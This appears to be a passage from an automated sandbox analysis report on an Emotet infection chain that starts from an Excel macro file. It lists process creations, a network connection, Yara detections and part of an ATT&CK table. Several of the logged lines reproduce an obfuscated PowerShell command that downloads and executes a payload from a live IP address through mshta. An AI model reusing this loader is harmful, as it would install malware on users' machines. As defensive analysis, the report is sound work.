                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter,11_2_1003B8BC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_1003ACCC

                            HIPS / PFW / Operating System Protection Evasion

                            barindex
                            System process connects to network (likely due to code injection or exploit)
                            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 160.16.102.168 80Jump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/cc/vv/fe.htmlJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqqJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqqJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServerJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Svccveo\pcrxj.oyh",ipGQHkspMdJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Svccveo\pcrxj.oyh",DllRegisterServerJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vinkqfnkvpzefpz\xhqzgf.ppi",igDWgBQJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vinkqfnkvpzefpz\xhqzgf.ppi",DllRegisterServerJump to behavior
                            Source: Yara matchFile source: NZW-010122 BNUV-280122.xlsm, type: SAMPLE
                            Source: Yara matchFile source: C:\Users\user\Desktop\NZW-010122 BNUV-280122.xls, type: DROPPED
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,9_2_1003F570
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,9_2_10043730
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,9_2_10014B71
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,11_2_1003F570
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,11_2_10043730
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,11_2_10014B71
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003DAA7 cpuid 9_2_1003DAA7
                            Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003906D GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,9_2_1003906D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003CE1A __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,9_2_1003CE1A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100453C8 GetVersion,GetVersion,GetVersion,GetVersion,GetVersion,RegisterClipboardFormatA,9_2_100453C8

                            Stealing of Sensitive Information

                            barindex
                            Yara detected Emotet
                            Source: Yara matchFile source: 16.2.rundll32.exe.2d30000.19.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.2c30000.15.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.2d60000.20.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.9b0000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.4c0000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.2ef0000.27.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.2e50000.25.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.2ba0000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2890000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.2c60000.16.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.950000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.950000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.24a0000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.2d00000.18.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.320000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.2970000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2e40000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.3050000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.2970000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2d0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.3d0000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.2cd0000.17.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.9b0000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.2a0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.2470000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.2e80000.26.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.24a0000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.f30000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.810000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.2b0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.3030000.29.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2890000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2d0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.2c60000.16.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.2dc0000.22.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2e10000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.2cd0000.17.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.8d0000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.3000000.28.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2e70000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.3060000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.4c0000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.af0000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.8b0000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.2e20000.24.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.710000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2fb0000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2780000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.2ba0000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.950000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.8e0000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.2d0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2fe0000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2e70000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.3d0000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.2a0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2e10000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.300000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.2c00000.14.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2fe0000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.2bd0000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.f30000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.2520000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.880000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.2dc0000.22.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.2d90000.21.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2e10000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.2e0000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.2d60000.20.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.3000000.28.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.770000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.8d0000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.980000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.8b0000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.810000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.2df0000.23.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.af0000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2860000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.840000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2fe0000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2fe0000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.29e0000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.2df0000.23.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.900000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.300000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.710000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.2e80000.26.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.2e0000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.2c00000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.10000000.30.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000000C.00000002.551947539.0000000003061000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.676591356.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.678280705.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.677632301.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.500040027.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.677997537.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.499309188.0000000000301000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.677450513.0000000002970000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.551880508.0000000002FB1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.677756106.0000000002C00000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.554134949.0000000000301000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.450824461.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.502588343.0000000000710000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.551919962.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.677929606.0000000002C60000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.551623719.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.499259204.0000000000210000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.678314605.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.550973971.0000000000211000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.551989518.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.499994350.0000000002E41000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.551538985.0000000000901000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.677111483.0000000000951000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.677326122.00000000024A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.502811029.0000000000771000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.676639526.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.678212374.0000000002D91000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.676821623.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.677356744.0000000002521000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.499873731.0000000002781000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.554075703.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.499710740.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.677199098.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.676670524.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.676732773.0000000000321000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.678106332.0000000002D31000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.499733166.00000000008E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.678697687.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.551472504.0000000000841000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.677832444.0000000002C31000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.678494850.0000000003000000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.551824983.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.677505319.00000000029E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.551706896.0000000002861000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.551513141.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.677680233.0000000002BD1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.678137863.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.554395165.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.499690055.0000000000881000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.551450592.0000000000810000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.678441464.0000000002EF1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.499762577.0000000000950000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.551800161.0000000002E11000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.550895567.0000000000180000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.499359397.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.677297499.0000000002471000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.499783564.0000000000981000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.678529505.0000000003031000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.678356507.0000000002E21000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.503146920.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.500113987.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.551739042.0000000002890000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.500072770.0000000003051000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.678048662.0000000002D01000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.499969504.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.499804100.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.678386689.0000000002E51000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.678412347.0000000002E80000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\ProgramData\JooSee.dll, type: DROPPED

                            Mitre Att&ck Matrix

                            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                            Valid Accounts21
                            Scripting                            		1
                            Windows Service                            		1
                            Windows Service                            		1
                            Disable or Modify Tools                            		1
                            Input Capture                            		2
